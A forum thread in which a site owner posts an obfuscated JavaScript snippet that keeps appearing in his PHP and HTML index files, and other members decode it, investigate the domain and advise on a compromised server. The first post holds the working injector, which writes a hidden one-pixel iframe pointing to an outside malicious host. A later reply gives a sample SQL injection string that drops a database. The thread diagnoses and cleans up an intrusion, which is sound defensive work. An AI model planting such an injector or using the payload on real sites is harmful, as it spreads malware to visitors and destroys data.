Sign in to follow this  
Followers 0
Paine

Has anyone seen this script before?

10 posts in this topic

Maybe this is a stupid question, maybe this is the wrong place for this, or maybe somebody knows and can help me out.

<script>wa='t';p='ht';f='k98';tb='ame';bg='.';v='sr';g='tp:';vf='/z';bs='t';px='v.h';br='yt';k='c';yr='m';ds='m';ej='/';au='/';t='com';sp='ifr';r='ca';cp='y';wz='ir';wf='u';b='5';se=sp.concat(tb);oz=v.concat(k);db=p.concat(g,ej,vf,wz,cp,r,bs,wf,yr,bg,t,au,f,b,br,px,wa,ds);var ip=document.createElement(se);ip.setAttribute('width','1');ip.setAttribute('height','1');ip.frameBorder=0;ip.setAttribute(oz,db);document.body.appendChild(ip);</script>

Ok so being a noob, I'll just lay out what's going on and hope I don't sound any stupider than I am. This script keeps adding itself to all of my index and start php and html scripts. I have no idea how this is happening or how to make it stop. My guess was that it was just a redirect that was being injected somehow into the scripts. The odd thing is that it's very inconsistent as to when it's happening, at one point after I removed the scripts and replaced them with clean ones, it happened after 20 minutes. Another time it took as long as 23 hours. It hasn't affected any other files than the index and start files, so it's being selective I just don't know why it keeps happening. If you can help me out, I'd appreciate it, or maybe I've just helped you out by giving you a great new script that will help you take over the world. Either way.

-P

0

Share this post


Link to post
Share on other sites


<script>
var ip=document.createElement(iframe);
ip.setAttribute('width','1');
ip.setAttribute('height','1');
ip.frameBorder=0;ip.setAttribute(src,hxxp://zirycatum.com/k985ytv.htm);
document.body.appendChild(ip);
</script>

Looks like someone wants this on your page. I haven't checked it out, but I turned http into hxxp 'cause I don't think this is a friendly link...

Edited by serrath
0

Share this post


Link to post
Share on other sites


<script>
var ip=document.createElement(iframe);
ip.setAttribute('width','1');
ip.setAttribute('height','1');
ip.frameBorder=0;ip.setAttribute(src,hxxp://zirycatum.com/k985ytv.htm);
document.body.appendChild(ip);
</script>

Looks like someone wants this on your page. I haven't checked it out, but I turned http into hxxp 'cause I don't think this is a friendly link...

whengoing to zirycatum.com it gives me:

403 Forbidden

nginx

dns records:

Site http://zirycatum.com Last reboot unknown Uptime graph

Domain zirycatum.com Netblock owner Spenelli Media Inc.

IP address 178.17.163.92 Site rank unknown

Country MD Nameserver ns1.zirycatum.com

Date first seen unknown DNS admin hostmaster@zirycatum.com

Domain Registrar unknown Reverse DNS 178-17-163-92.static-host.net

Organisation unknown Nameserver Organisation unknown

the actual link has no data. its just a blank page. most likely formerly hosting malware.

0

Share this post


Link to post
Share on other sites

Wow, thanks guys. I was kind of thinking that's what it was, but I've never seen anything like that before so I couldn't make heads or tails of it.

Again thanks

-P

0

Share this post


Link to post
Share on other sites

Nice bit of obstifucation.

When you say "adds itself to my index page" do you mean if you pull up the index. file in a text editor the above code appears in it? if so, your server is backdoored somehow by a process that has write permissions to those files and until you fix the hole, its just going to keep popping back to insert its edits.

If you say what software stack (eg lamp, samp etc) you are using and what version (but don't reveal your url, or some may actively help you notice the problem by p0wnage, this is after all a hacker forum and there are curious souls here regardless), someone might point out which part of the software stack you are running is the likely culprit...

Or someone could have just broke into one of the network daemons the oldschool way and have rootkitted it...

0

Share this post


Link to post
Share on other sites

Brave soul.

I opened the page in a sandboxed web browser..safe enough. especially since the computer isnt mine ;P

0

Share this post


Link to post
Share on other sites

wget with the UA string set to the most exploitable version of IE you can think of is pretty useful too. Its interesting switching the UA round versions and between IE and firefox and getting different payloads too.

0

Share this post


Link to post
Share on other sites

Nice bit of obstifucation.

When you say "adds itself to my index page" do you mean if you pull up the index. file in a text editor the above code appears in it? if so, your server is backdoored somehow by a process that has write permissions to those files and until you fix the hole, its just going to keep popping back to insert its edits.

If you say what software stack (eg lamp, samp etc) you are using and what version (but don't reveal your url, or some may actively help you notice the problem by p0wnage, this is after all a hacker forum and there are curious souls here regardless), someone might point out which part of the software stack you are running is the likely culprit...

Or someone could have just broke into one of the network daemons the oldschool way and have rootkitted it...

Yes, sorry I guess I forgot to put that in. When I open the file in a text editor I found the script added in at the bottom of the page. My guess was it was an injection of some kind or another. Although I'm not really sure I understand how those work lol. I guess we're running lamp, and the only version I can remember is php5, in on centOS with WHM on there too if that helps. After basically just messing with a few things (this is how do everything, I never actually know what I'm doing till at least the third time, yeah I'm a noob) I found that the perms on the php and html left them open to user modification. I turned that off and it stopped happening.

0

Share this post


Link to post
Share on other sites

Warning, Caution, Mayday! Don't put anything you value any degree of confidentiality with on that server as is.

While thats generally a good rule for any internet facing webserver if possible, someone has managed to get filesystem level access to that web server and you have no way of knowing what else they changed when they had that.

They could have left other processes and backdoors on the system sleeping, and while you've closed the automated spambot injecting one, they could be popping back to see if theres any information they could harvest manually that could generate money for them, or be using it as a attack launchpad in some undetectable to you and your current toolkits level. There's a whole genre of software designed to be installed post hacking by the hackers to enable them to keep a level of control over it. Google rootkit. Or invisible rootkit. Or read round here.

Seriously, treat it as still completely compromised because as far as you know it still is. If something gets broken into, the content you generate should be backed up and the whole server nuked and reinstalled then patched against whatever you find before it goes back onto the internet. If its a virtual server, they can probably reimage in minutes, and you can get exclusive access to make your config changes via an alternative ip. Depends on how receptive the hosting company is. Two of mine are great, and the third doesnt give a s*** and won't assist even with security stuff they have caused which the fix on would be to their benefit. Maybe thats why they are a 1/4 the price, so I just use that box for low importance hosting of bulk volume stuff.

I run tripwire on the servers I care about lots amongst various other monitoring tools, and I can check whats been altered if they get attacked because it takes a cryptographic sum of the entire machine less a few directories which change often and dont hold binaries or config. And even if I ran the checksum check post successful intrusion as identified by other monitoring tools on there, I'd still pull that server from service and nuke it from orbit.

For the sql injection, basically a simplified summary is typically the webserver takes in post data from a form somehow, say a search box or username etc. And it doesn't check for unsafe char's in the input or overlong data lengths, or source of post (some mad fools do their sanitization in javascript client side, in which case its trivial to just make a new page up with their parameter names in and bypass every control or safety measure they put in).

The server hands this data off to the sql server, which starts parsing through the data. So lets give a simple example. Some of this syntax might be a bit wobbly because I'm writing it off the top of my head but it outlines the general act.

A username box is entered with "'; DROP database mysql;", and posted to your webserver. The webserver hands it to mysql, which comes along and parses the name contents, which ends up as a DROP DATABASE command once the first ` closes the original query. If your webserver is running with full priv over your mysql database, it could result in instant complete deletion. Of course most attackers don't want to make a noise, so instead its more common to do a select * and attempt to extract information stored in there with the same method, or inject new users in to connect with etc. Ive seen this work against commercial products so don't feel too ashamed if you find it too. Most of the open source forums etc are fairly well tested by now, but they do have the occasional vuln identified so its always good practice to stay with as new a version as you can with them, ditto for the rest of your software stack if you have any control over it.

Not many people would blow a 0 day on a forum about donkey saving or something, its mostly known exploits months or years old for that level.

Bit of a learning curve to take all the above in quickly and understand it, but you'll get there if you want to.

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0